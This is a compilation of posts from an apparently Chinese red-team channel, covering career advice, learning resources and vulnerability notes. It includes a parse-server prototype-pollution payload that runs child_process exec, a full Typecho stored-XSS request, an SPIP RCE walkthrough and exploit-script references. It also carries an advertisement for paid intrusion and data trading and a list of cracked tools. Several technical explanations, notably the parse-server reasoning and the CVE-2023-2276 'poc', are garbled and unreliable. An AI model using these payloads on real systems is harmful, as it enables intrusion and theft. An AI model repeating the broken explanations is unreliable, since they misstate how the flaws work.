parse-server那个原型污染漏洞导致rce的漏洞,昨天有人问的,钻研了一下,应该是网上的文章有地方没说对
复现环境说的是mongodb依赖包版本3.6.11,当BSON数据中的对象包含_bsontype键,当他的值为Code时,该对象会被判断为Code类型。在进行序列化时,系统会调用serializeCode这个函数对该对象进行序列化处理
在反序列化时,如果遇到Code类型的数据,则系统会执行js内置的eval操作。将字符串变为可执行代码。这个算是比较常规的风险代码,所以他又定义了evalFunctions这个参数,通过一个叫GridFS的流程处理metadata
如果在代码中没有设置info.appId的值,程序就会进入if语句块,如图,把fileViaJSON设置为true。如果缓存中没有info.appId的信息,程序会继续执行下去。在代码中可以找到appId的赋值操作,并且后面还有一处校验。这一步需要保证_ApplicationId是正确的appId,否则程序就会退出。根据这个逻辑网上有多种利用方式,其中一种是控制out.value.__op out.key从而污染原型的evalFunctions参数,构造一条新的调用链去在FileCoder里面汇总变量,修改create包从而修改file类型
然后网传官方的修复措施是对metadata进行过滤,但是没有修复原型污染。这个说法我钻研了一下不认同。在找新的可以上传Code类型的位置时他示例用了这个delete ({}).
proto
.evalFunctions; require(
chil
d_process
).exec('touch /tmp/123.txt')"
如果按照他上文的思路,child_process模块获取空对象后在BSON库中检验evalFunction,执行的是Node.js,metadata放到fs.files表,所以还是可以构造hook函数,但补丁后把其他文件内容放到fs.chunks表里,无法通过第二个return返回key和value,所以污染位置要么是前面的restUpdate要么就是函数传出路径错误根本无法运行,这种情况下还能继续RCE反正我是不赞同的
红队小工具 | 利用DCERPC协议,无需认证获取Windows机器主机信息和多网卡信息
工具主要用于探测内网Windows机器的操作系统信息、域名、主机名以及多网卡信息,可以辅助红队快速定位多网卡主机,以及判断机器是否在域内
优点: 无需认证,只要目标的135端口开放即可获得信息
关于自学搞黑产接单以及渗透挣钱问题,赛博枪杆子的幻想与赛博保安的现实
自学想要正规就业,没有学历是不大可能的,公办本科起码,如果不是小城市,大专现在连三四千的安服工作都基本上找不到
学多久可以接单拿站?如果目标是TG上通常的各类博彩/商品网,框架较新,不幸的,如果没有天赋学一辈子都到不了这个程度
小迪暗月马士兵等网课,基础不牢,并且计算机这个东西技术更新极快,漏洞多少钱更新频率什么0day1day都是以天来算的,成熟安全产品的作用周期最多就半年左右,网课能讲的差不多都是古董了。举个例子,某人自学网课看什么文件上传漏洞,找到个网站file读取链前后端处理不一致,看csdn上的文章马上一手MIME绕过文件上传,修改Content-Type成了image/jpeg,一想反正htaccess文件解析把所有用户带fox名字的文件全都以php文件拓展名来运行,肉鸡也懒得买了,POST /upload.action HTTP/filename="某某.jsp"Content-Type: image/jpeg/,然后application上搬运百度。可是网上的文章永远不会给你讲有个叫做redis的没用ACID用的md5加密和Key-Value匹配做关系匹配,一样的htaccess解析漏洞原文作者流量特征就真的只是jpeg,你打无害的poc的时候也是jpeg,你准备脱裤的时候结果人家一看一堆不分块的formdata,后面跟的是一堆奇怪的sessionname,就跟撤硕里没冲的一坨💩一样明显。又举个例子,大家最熟的sql注入,你用工具扫出来注入点又按照网上的教程复杂粘贴绕过字符,在长亭雷池(云端免费版)的面前效果就如图所示,你干了什么,你想干什么,你的IP,甚至根据流量特征你用的什么工具,你在工具里的命令是怎么输的,都知道得一清二楚。
我在高考护网的时候作为这玩意的开发者有幸见过雷池实体waf完全版满功率运作时的盛况,一百多斤的金属箱子用插了两个220v的插线孔,耗电量相当于四台挂式空调,七八个安服围着监控数据面板。现在的互联网产品无论是搭建还是安全都讲究傻瓜式一键式,你黑网站时的对手不是你想的小白站长或者苦逼程序员,而是一堆九八五科班十几年的智力传承与结晶。傻瓜建站用的那些东西,什么wordpress,nginx,Apache,国外公司花几十万找专业审计人员审过了你觉得你能找到漏洞吗?建站的只需要搬现成,把这些最新成果下载部署完事,本质上红蓝高度不对称,自学的水平普遍较低这是不可否认的,开发低点没事,基本上也能找到活干,渗透如果不到达那个较高的门槛线是很难有产出的。当然如果你们过了这条线,搞黑产能恰的钱开发也比不了
最后是国内的溯源与反制,国安公安不提,阿里腾讯应响,深信服奇安信这些安全公司,净网云剑/春雷恶意行为收录/国护省护,层层追责出事了个个都玩命收拾你,能在网上教程看到的永远是过时而且过时很久的技术。一线安全从业者也没几个敢说自己了解国内各类手法,我反正没那个干完黑产后完美骗过我师弟师妹的信心,自学要想做到指定拿站/顺利变现/不吃牢饭,只能说是任重而道远了
昨天开完外群就有人问你们Oracle和晓骑营哪个更厉害……算是吃瓜群众的经典误区了。网络安全又不是修仙小说哪来绝对的谁比谁厉害,正好今天扯一下一般意义上目前国内红队各阶段的等级要求
首先是初级红队,熟练使用xray,nmap,AWVS等扫描工具以及sqlmap,brupsuit,wireshark,msf等工具,基本无语言编程能力,依靠脚本扫描体系进行初步渗透。这个水平也是百分之九十以上看马士兵/小迪网课自学者的水平,特点是在国内安全环境下基本上无法实战成功,也找不到岗位解决就业问题(你爹要是老板当我没说),如果不进一步学习只有转行了
红队中级,在红队初级的基础上掌握web原理和语言编程能力,fofa,Haktrails等资产搜索引擎的使用,能高效利用网络上公开的poc批量扫描站点并利用漏洞,具有内网横向渗透以及域控能力。就业上属于门槛线,可以在继续掌握等保制度以及安全产品使用的条件下转三四千一个月的安服,也有可能是近万元月薪的渗透测试工程师。红队中级跨度较大,薪资差距也大,当然工资多少看的也是个人能力,大部分专业的网络安全从业者都处于这个水平
红队高级,这个时候技术路线出现了分化,你齋就属于第一种,技术背景是高校科班,研究方向是java和php编码与审计,情报搜集,基于Python的POC加工能力,熟悉常见安全产品的绕过,有src甚至是cvnd的漏洞挖掘经验。晓骑营属于第二种,手握大量的扫描器/漏洞库/服务器资源,强大的资产信息搜索能力,各种最新的批量利用脚本。两者之间没有高下之分,一个POC管你是自己写的还是别人给的效果都是一样的,如果要说指定站点渗透肯定是第一种技术路线强,但是如果要比实战中哪个杀伤力更大,后者动辄几百台服务器全球扫,即使排除误报和权限维持失败能get的shell一分钟可能比我一年还多
(这里也说一下别天天在那刷什么脚本小子不行没技术含量,大多数人也就听说了脚本小子这一个词,好像贬低人家用脚本的自己就跟什么大师傅一样,shell脚本编程相当难,脚本也是个提高效率的好东西,用好了就是脚本爷爷,什么匿名者killnet都爱用脚本,你不服气吗?)
核心红队,高级红队的基础上在某一领域,如内网,逆向,嵌入式,EDR等方面专精,并能关注0day级别的开源情报威胁,开发岗级别的代码能力以及成熟的自编写插件/工具/二开经验,就业是各大安全公司中月薪两三万的高级渗透工程师/漏洞研究员,大学里的安全实验室负责人
论外级,C9级别高校硕博加中科院院士导师执教基础学科的学术背景,就业于奇安信深信服等T1厂家的核心开发岗/中字头国企/国家相关安全行政单位,涉军涉密项目,国际APT行动。到了这个层次网络安全就已经是数学问题了(原因别问我,我只是知道但讲不明白)ZC老师华科升清华的论文就讨论的是在以十年为维度的完备可分度空间背景和UTF-8规则下,证明针对命令注入编码与字符集的过滤的正则的有节线性,最终把前后端漏洞控制收敛成不可测集这种问题,(人话:再过十年各种网络注入就死完了)特别反直觉,整个数据建模过程我光听就头大,什么群论实分析泛函数学物理方法都往上整。论外级不是靠努力能到的,看天赋也看运气,我自认为也算个数学小超人,但即使是在本科毕业技术巅峰挖shiro反序列化0day的时候才勉强有了一点摸到论外最下位的感觉(持续时间几分钟,现在上班摸鱼己经废了红队方向到中高级都难)至于这个等级的工作日常我不清楚也不乱讲,可能真的就和电影小说里的黑客差不多吧
一个 Pwn 从 0 到 0.1 的自学指南
Assembly-Language 汇编语言
Reverse-Engineering 逆向工程
PWN Tools 分析工具
PWN You-just-got-pwned!
Reverse Tools 分析工具
Angr CTF 及其 WriteUp
链接:https://pan.quark.cn/s/7a7b26010e18
禅道系统权限绕过命令执行批量检测脚本
影响版本:
17.4以下的未知版本<=version<=18.0.beta1
旗舰版
3.4以下的未知版本<=version<=4.0.beta1
企业版
7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
关于如何入门学习渗透,巨多人在问这个事
能有条件在大学里系统学肯定是最好,科班注重数学基础和工科思维的培养,上限肯定是最高
这个路线比起一般培训班,小迪暗月这种,是我个人按大学体系排的,比较注重基础而不是上来就kali和工具
网上培训班也会给你讲一点原理,比如给你讲注入语句1' order by 1#对应的后端sql语句是SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#`,你光听这个好像原理也懂了简单嘛不就是多了个单引号吗,然后一个substr(database(),1,1)='q' and sleep(3),我去这是啥。xss里复制粘贴payload实战各种过滤绕不过,甚至还有js基础没打好自己语句就写不闭合的,等等,都是网课受害者的典型类型
按着我给的这个思路学(前提是你认真学的话)花一年多到个红中水平应该是有可能的,不具有审计大型框架挖洞的能力但超出脚本小子也不少,实战里起码能自己按着实际情况加工一下exp,绕过一些老旧的安全产品
然后是找的第一部分的一些课程资源
【OSI七层模型最细节教程,一天学完各层模型及常见协议,停止低效学习!!!-哔哩哔哩】 https://b23.tv/Dzb63bSk
【五分钟理解:TCP/IP协议中网络包层层嵌套的涵义。必须要一层套一层吗,不可以干净利落一点直接传输吗?不可以!-哔哩哔哩】 https://b23.tv/DfA0vQP
通过百度网盘分享的文件:大规模路由技术
链接:https://pan.baidu.com/s/1sJDGYS5VCm4SJ6-n3-8eDg?pwd=b8em
提取码:b8em
复制这段内容打开「百度网盘APP 即可获取」
通过百度网盘分享的文件:网络安全基础
链接:https://pan.baidu.com/s/1auIwK6FDeVXWwJE2bMyGyg?pwd=3d28
提取码:3d28
复制这段内容打开「百度网盘APP 即可获取」
通过百度网盘分享的文件:Http协议基础
链接:https://pan.baidu.com/s/14LsuOH24rK8jNE1Wx5Qu-Q?pwd=ji9m
提取码:ji9m
复制这段内容打开「百度网盘APP 即可获取」
Typecho框架最近出现严重的xss存储型攻击漏洞,可直接getshell
描述
Typecho错误注释具有漏洞的URL,对任何具有xss有效载荷的文章进行评论,在Comments/usr/themes/default/comments.php中,只过滤开头没有任何其他保护,并直接回显到html,再次访问相同站点时可触发xss
poc
POST /index.php/archives/1/comment HTTP/1.1
Host: 127.0.0.1
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4
补丁地址https://github.com/typecho/typecho/releases/tag/v1.2.1-rc
暂时停更一下
前天下午突然被领导突袭一车拉到某不知名宾馆培训(没敢带这个手机,失联几天也不是被抓了)
高考专项护网,内容挺复杂也不许乱说,能透露的主要分为三个阶段,一个是考试期间保证每个考场学校的破逼电脑能正常放听力还有音频文件的加密,摄像头传输到监考中心的稳定性云云,第二个是阅卷期间内网以及最要命的成绩上传全市数据库排名过程,第三个是查分期间的网站稳定(这个倒和我的关系不大,gov的防护我是相信的不太依赖安服,就看上面都服务器抗不抗造了)
总的来说高考期间的网络安全形式很复杂一点不轻松,只是曝光度不高社会关注度也不大,很多东西都智能化了,每个考场都要兼顾(比如听前几年干这事的同事说见识过申必学生为了好玩u盘拷木马把学校一体机远控了,还好及时排查不然可能会引起放听力都时候他把远程学校电脑音量关了的重大事故),出网的东西也一堆这是我没有想到的(当然内网也不绝对安全,做好了改卷的时候哪个神人玩横向移动的准备)
今天培训完晚上放回来拿衣服和生活用品,顺便说一句我还活着没被抓。明天开始正式停更,具体时间未定,第一次参加这种行动还是希望带黑客别有事没事日弄高考玩,这个不比平时上摸鱼,出事了我是真得进局子😨
挂人氵
隔壁群看到有人在问,/channel/SQL011 靠谱不靠谱,这么多网站后台的截图还放了团队logo证明并非盗图
然而其实大黑客所谓的“坐拥众多后台”很容易就能实现,打开http://www.cssmoban.com/hot
随便点进一个后台模板,挂你的logo合影,结束,毫无技术含量的骗局😅
而他那频道里的“技术文章”,也是百度一搜发现基本上没改字复制粘贴而来,
所谓引流十五人赠送的笔记来自几年前烂大街的小迪公开课,b站私信那些卖课的营销号就能领取全套
频道简介摘抄表弟@G_biaodi007(不是简介里那个,具体哪个频道忘了好像是已经弃用了的腾蛇的那个老频道)
显齋Oracle是国内顶尖的黑客组织,成立于2020年。我们的成员来自浙江大学,华中科技大学,北京邮电大学和西北工业大学等高校,为现役腾讯,奇安信,安恒信息等国内一线安全厂家的高级红队渗透测试工程师。
组员战绩包括但不限于DEFCON CTF决赛前十,全国工业互联网安全技术技能大赛冠军,DSCTF首届数字空间安全攻防大赛冠军,RWCTF体验赛冠军等。
实战中针对台湾省,东南亚国家及北约国家等网站发起过多次攻击,获得如台当局伪青年辅导委员会政府官网等多个gov网站的后台权限。
组织并不涉及商业化黑灰产行为,但不约束组员行为,此频道为有偿渗透接单,数据交易频道,教学资讯频道请移步 @Oracleimpact
(后续两频道除少数运营信息之外技术内容会同步更新,推荐根据需求只关注一个便于我们统计订阅数,文字编辑 @metaspolit233 ,不接单请勿打扰)
一款基于fofa api语句的资产收集工具,用于红队快速收集顶级域名或者ip相关关联的资产
新增计划
新增资产存活检测 已完成
新增资产指纹识别 未完成
新增xray工具联动 未完成
新增awvs工具联动 未完成
新增afrog工具联动 已完成
新增关联资产爬虫 未完成
新增WAF识别 未完成
新增多线程资产存活探测 未完成
新增其他测绘平台 未完成
新增数据自动去重 未完成
新增子域名资产穷举 未完成
新增fofa语句插件 已完成
问答环节
q:渗透需要学历吗?
a:如果是找工作肯定需要,自学的话和学历没关系,能不能干事的唯一标准就是能力
q:自学遇到了瓶颈,无法提升也无法实战怎么办?
a:外围多看实战资料,内网多打靶机跳出被教程引着走的圈子,搞懂原理自己理解,有空自行思考复现几个漏洞比看教程有价值
q:公安执法部门等国家队是不是都非常强?
a:错误的,公安涉及技术的只有网警,知识来源于大学警校中网络安全与执法专业,需要花费一部分时间学习司法执法相关知识,并且会侧重取证,监控等非渗透知识。第二是公安属于体制内公务员,各类人事应酬非常多,技术上是难以保持一线的,一般重大事故或行动都会外包给安全公司。但外包有外包的好,公安部门作为网络安全主管部门能调动的资源非常多,你们熟知都什么奇安信深信服都是晶哥的打手,所以也千万别去招惹警察叔叔
q:外群是拿来做什么的,投了简历也没见有行动?
a:后续会开展实战行动以及针对组员的拔高培训,录课中勿催
q:在渗透中感觉最难的是什么?
a:各种报错,没有之一
q:表姐有男朋友吗?平时穿黑丝吗?喜欢什么样的男生?
a:有。正式场合会穿黑丝,但是因为我比较暴力经常穿成一次性用品所以频率不高。喜欢像孙笑川那样儒雅随和又很文明的人
q:CVE-2023-27372中SPIP公域表单值序列化处理不当 利用php代码中的ENV**可以在密码重置模块实现注入,怎么利用实现rce?
a:控件中把protege_champ()这个函数作为正则表达式,
函数的代码:
<!-- File : /squelettes-dist/formulaires/oubli.html -->
<input[ (#HTML5|?{type="email" class="text email" autofocus="autofocus" required="required",type="text" class="text"})] name='oubli' id='oubli' value="#ENV**{oubli}" autocapitalize="off" autocorrect="off" />
这个函数对HTML表单字符动态处理,从请求中获取名为"oubli"的GET或POST参数,和SPIP模板构造冲突了,所以输入字段是不对序列化字符进行处理的。把序列化PHP字符串注入变量$_POST['oubli']到/spip.PHP端点上重置密码,从而page=spip_pass,在服务器上有导致RCE。
q:孙尚香出装出什么?
a:疾步鞋黑切无尽宗师电刀,最后泣血复活甲二选一
q:学渗透没有天赋怎么办?
a1(saber):转行
a2(落老师):天赋是一方面,经验也很重要,不是绝对的
a3(某倭瓜):有兴趣就好,可以先尝试,试一试总比直接放弃好
a4:(老黄):我特么双非一本呢还不是学得挺好,别学什么小迪暗月坑人
a5(🐗老师):天赋决定的是上限,安全直到红队高级为止不怎么看天赋
a6(🚗🧊):有这时间学网安费力不讨好的,自己哪个有天赋学哪个吧
q:自学web可以找工作吗?
a:基本同一,看能力,不过web神仙太多了,选什么二进制嵌入式就业会更方便
CVE-2023-2982WordPress身份验证旁路漏洞
如果目标的wordpress站点有进行第三方验证的登录的插件,这个插件的加密不足会导致身份验证漏洞,在知道邮箱的情况下可直接绕过登录验证,拿到后台
https://github.com/RandomRobbieBF/CVE-2023-2982
网络安全法律法规、安全政策、国家标准、行业标准知识库
法律法规
常见标准代号
强制性标准代号 GB
推荐性标准代号 GB/T
指导性标准代号 GB/Z
实物标准代号 GSB
按体系分类
一般性法律规定
《中华人民共和国宪法》,法律效力位阶:宪法,施行日期:2018-03-11
《中华人民共和国国家安全法》,法律效力位阶:法律,施行日期:2015-07-01
《中华人民共和国治安管理处罚法》,法律效力位阶:法律,施行日期:2013-01-01
《中华人民共和国保守国家秘密法》,法律效力位阶:法律,施行日期:2010-10-01
规范和惩罚信息网络犯罪的法律
《中华人民共和国刑法》,法律效力位阶:法律,施行日期:2021-03-01
《全国人民代表大会常务委员会关于维护互联网安全的决定》法律效力位阶:有关法律问题和重大问题的决定,施行日期:2000-12-28
直接针对信息安全的特别规定
《中华人民共和国网络安全法》,法律效力位阶:法律,施行日期:2017-06-01
《中华人民共和国计算机信息系统安全保护条例》,法律效力位阶:行政法规,公布日期:2011-01-08
《中华人民共和国电信条例》,法律效力位阶:行政法规,公布日期:2016-02-06
《中华人民共和国计算机信息网络国际联网管理暂行规定》,法律效力位阶:行政法规,公布日期:1997-05-20
《计算机信息网络国际联网安全保护管理办法》,法律效力位阶:行政法规,公布日期:2011-01-08
具体规范信息安全技术、信息安全管理
《中华人民共和国电子签名法》,法律效力位阶:法律,施行日期:2019-04-23
《计算机软件保护条例》,法律效力位阶:行政法规,公布日期:2013-01-30
《商用密码管理条例》,法律效力位阶:行政法规,公布日期:1999-10-07
《中华人民共和国保守国家秘密法实施条例》,法律效力位阶:行政法规,公布日期:2014-01-17
GB/T 37090-2018《信息安全技术 病毒防治产品安全技术要求和测试评价方法》,施行日期:2019-07-01
《计算机信息系统国际联网保密管理规定》,颁布单位:国家保密局,施行日期:2000-01-01
《金融机构计算机信息系统安全保护工作暂行规定》,颁布单位:公安部,颁布时间:1998-08-31
安全等级保护
GB 17859-1999《计算机信息系统 安全保护等级划分准则》,实施日期:2001-01-01
GB/T 22239-2019《信息安全技术 网络安全等级保护基本要求》,实施日期:2019-12-01
GB/T 25070-2019 《信息安全技术 网络安全等级保护安全设计技术要求》,实施日期: 2019-12-01
GB/T 28448-2019 《信息安全技术 网络安全等级保护测评要求》,实施日期:2019-12-01
GB/T 25058-2019 《信息安全技术 网络安全等级保护实施指南》,实施日期:2020-03-01
GB/T 28449-2018 《信息安全技术 网络安全等级保护测评过程指南》,实施日期:2019-07-01
GB/T 36627-2018 《信息安全技术 网络安全等级保护测试评估技术指南》,实施日期:2019-04-01
GB/T 36959-2018 《信息安全技术 网络安全等级保护测评机构能力要求和评估规范》,实施日期:2019-07-01
GB/T 22240-2020 《 信息安全技术 网络安全等级保护定级指南》,实施日期:2020-11-01
数据安全
GB/T 37988-2019《信息安全技术 数据安全能力成熟度模型》,实施日期:2020-03-01
马上就要高考志愿填报了,频道里可能有想学网安专业的,作为当年被招考老师忽悠的受害者大概科普一下这个专业的填报经验
如果高考分数没上本科线就不要考虑网安或者计算机方向。整个互联网无论是开发还是安全这几年都卷得不行,长亭这种T3安全企业去年招聘的几个学历是一个南航一个华南理工加我一个电子科大,南航那个还是研究生,大专学网安不是当保安就是送外卖
网安不卷还贼有钱,放屁。这个是本专业招考老师忽悠人的经典话术。国内就业分为蓝队红队,蓝队确实不是特别忙但工资低,月薪三千的安服大有人在。你们看到的二三十K的岗位,渗透测试工程师,漏洞研究员,逆向工程师等都属于红队,卷得不比开发岗轻松,时刻关注最新的威胁情报和技术文章等,不到两年毛就掉完了
还有任何安全岗位,都存在负责问题。有人说安服小事不用管大事管不了,这个话很中肯,但企业不会管这个,花了钱养你有0day打过来你也得硬着头皮上。安服可以摸鱼吗?可,不出事也确实没哪个管你,一但倒霉丢工作算轻,像我这种手里几个gov的就只有等着进局子了
关于填报,纯外行会说学计算机,懂一点的会说信息安全或者网络空间安全,实际上不止。软件工程,网络工程,通信安全是网安里逆向,web等单个方向的专精,学完过后本领域的基础知识和某些拓展大概率比网安本专业的更强。计算机科学与技术是最大的专业,包括安全与开发。这四个专业学完过后考研转安全或是自己上一下网课就业是完全没问题的。很多大学没有给网安专门开设专业,电子信息类,计算机类,工科试验班这几个都可能会有网安方向
最顶的选择是本科选应用数学再考研网安
T0到T5的相关院校
清北浙
华科,哈工大,南大,北航
电子科大,川大,北邮,上交
北交,北理,中科大,同济,西电,西交
南开,东北大学,吉林大学,中南大学,西工大,人大,天津大学,大连理工,东南大学
北科,南航,杭州电子科技大学,合工大,厦大,华南理工,中山大学,重大
附:
1.虽然web渗透是大家最感兴趣的,但确实强烈不建议学这个方向,神仙太多了大家都在往这里面卷,今后前景好的应该是云安全,嵌入式,二进制等方向,工资高的也都得兼顾开发和安全能力
2.像华东师大这种虽然开了信安专业但是专业课程不是你们感兴趣的学校我就直接排了
3.还有几个军校,国防科技大学,解放军信息工程大,陆军工程大学,火箭军工程大学,想参军的也可以自行考虑,包括电子对抗技术这个专业被称作军校网安,我不很懂你们只有自行去了解
第一章:沉淀
第二章:青春终于败给了资本,那场高考毁了我的本科梦
第三章:大专也是大学
第四章:专业网安,未来的黑客
第五章:专升本失败,直接就业少走几年弯路
第六章:距某ctfxx天,顶峰相见
第七章:比赛都是套路,专心实战
第八章:两天护网兵,一生国企情
月薪三千五,华亭也是亭
第九章:主管不是人,愤然辞职
第十章:黑客烧烤
第十一章:烧烤店倒闭,黑客维修
第十二章:行业不吃香,黑客代驾
第十三章:吊销驾驶证,碧桂园五星上将
第十四章:教训不只好歹的业主,欺负落单的外卖员,遇到危险全身而退
第十五章:资深java程序员在家待业
第十六章:入职🐎士兵 《暗网黑客渗透》《kali渗透聪入门到精通》《红客联盟内训》《一秒获取女神信息,黑客有多可怕》
第十七章:接触Telegram,黑客之神王者归来
第十八章:入侵美韩,横扫台湾,一声令下十万0day归来,北约闻风丧胆,博彩网站后台更不在话下,各种实时数据收钱拿站
第十九章:个户全户三网机主q反微反接码点号轰炸机,最后喜提反诈
大结局:西工大被美国攻击,若有召,战必回!
#黑客# #渗透# #匿名者# #网络安全#
#APT# #Kali# #红客联盟# #北约# #技术纯享# #FBI# #暗网#
漏洞氵
Adam Mobilmen终端软件特殊元素的不正确过滤SQL注入漏洞(CVE-2023-1508)
披露时间 北京时间2023-05-24凌晨六点左右,CVSS评分9.8(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
JSON:
{"dataType":"CVE_RECORD","dataVersion":"5.0","cveMetadata":{"cveId":"CVE-2023-1508","assignerOrgId":"ca940d4e-fea4-4aa2-9a58-591a58b1ce21","state":"PUBLISHED","assignerShortName":"TR-CERT","dateReserved":"2023-03-20T08:10:52.189Z","datePublished":"2023-05-23T20:00:41.023Z","dateUpdated":"2023-05-23T20:00:41.023Z"},"containers":{"cna":{"affected":[{"defaultStatus":"unaffected","product":"Mobilmen Terminal Software","vendor":"Adam Retail Automation Systems","versions":[{"lessThan":"3","status":"affected","version":"0","versionType":"custom"}]}],"credits":[{"lang":"en","type":"finder","user":"00000000-0000-4000-9000-000000000000","value":"Omer Fatih YEGIN"}],"datePublic":"2023-05-23T20:00:00.000Z","descriptions":[{"lang":"en","supportingMedia":[{"base64":false,"type":"text/html","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adam Retail Automation Systems Mobilmen Terminal Software allows SQL Injection.<p>This issue affects Mobilmen Terminal Software: before 3.</p>"}],"value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adam Retail Automation Systems Mobilmen Terminal Software allows SQL Injection.This issue affects Mobilmen Terminal Software: before 3.\n\n"}],"impacts":[{"capecId":"CAPEC-66","descriptions":[{"lang":"en","value":"CAPEC-66 SQL Injection"}]}],"metrics":[{"cvssV3_1":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","integrityImpact":"HIGH","privilegesRequired":"NONE","scope":"UNCHANGED","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"format":"CVSS","scenarios":[{"lang":"en","value":"GENERAL"}]}],"problemTypes":[{"descriptions":[{"cweId":"CWE-89","description":"CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","lang":"en","type":"CWE"}]}],"providerMetadata":{"orgId":"ca940d4e-fea4-4aa2-9a58-591a58b1ce21","shortName":"TR-CERT","dateUpdated":"2023-05-23T20:00:41.023Z"},"references":[{"tags":["government-resource"],"url":"https://www.usom.gov.tr/bildirim/tr-23-0284"}],"source":{"advisory":"TR-23-0284","defect":["TR-23-0284"],"discovery":"EXTERNAL"},"title":"SQLi in AdamPOS's Mobilmen Terminal Software","x_generator":{"engine":"Vulnogram 0.1.0-dev"}}}}
影响版本
Mobilmen移动端从6.0之前的5.0全部版本均受影响(但不包括6.0)
poc
在公开频道里白嫖这种漏洞的poc你想屁吃呢😅
漏洞氵(CVE-2023-2276)
WordPress中使用WooCommerce多供应商插件的未授权访问漏洞
影响版本2.10.7(包括2.10.7)及之前,插件在trunk/includes/libs/stripe-gateway/.editorconfig处提供的用户控制的对象访问权限允许用户绕过授权并访问系统资源,使得未经身份验证的攻击者有可能通过stripe-gateway/.php-cs-fixer.php更改用户密码甚至接管管理员帐户,造成漏洞的代码逻辑如图
poc:
parse_str($_POST['wc_fm_membership_registration_form')
$wcfm_membership_registration_form_data)
$wcfm_membership_registration_form_data = WC_clean($wcfm_membership_registration_form_data)
get_wcfmvm_membership_registration_messages()
$has_error = false;
$wcfm_membership = ''
$subscription_pay_mode = 'by_wcfm';
if (apply_filters('wcfm_is_allow_registration_recaptcha_enabled', true))
{
ctf工具合集(好多都有点年头了,但可以入门的时候拿来过渡一下)
吾爱010 Editor 64位10.0.1汉化破解版
FileLocator Pro8.2.2766.x64中文绿色便携专业版
路由器密码查看工具(RouterPassView)v1.86
二维码扫描器v1.0绿色版
二维码工具(QR Research)
ZIpRar密码破解
Wireshark 64位V3.2.4.0官方版
winhex19.8
USB数据检测抓包工具(USBPcap 1.0.0.7.2ip)
UPX Unpacker
sqlmap汉化工具
smzy_ Xshell6win10
save-page-we插件.cnx
RAS整数因式分解(yatu-1.34.)
Notepad++ 7.8.8官方中文版
New御剑1.5后台扫描(加强字典版)
adX_ han.jar
lQRCode批量扫图
HexDecChar_ n
GoldWave Vv6.41绿色修正版-查看声图谱工具
Explore2ts(ext2ex3文件系统查看器)V1.09汉化绿色版
Dreamweaver MX 2004
CTFCrackTools3.2.4.7
CTFcrackools(解密工具)
CRC计算器(CRC Calculator)V0.1
crc32-master (CRC32爆破工具)
CRC16校验码计算器Converter-cn编码工具
Burpsuite+ 1.7.26+Unlimited
ARCHPR4.54
APKSign
+++tweakpng改图高度工具
++stegsove-- -图隐写查看器
分享链接:「CTF工具软件」,复制整段内容,打开最新版「夸克APP」即可获取。
无需下载在线播放视频,畅享原画5倍速,支持电视投屏。
/~e7cb31JDRj~:/
链接:https://pan.quark.cn/s/8b5353f805f8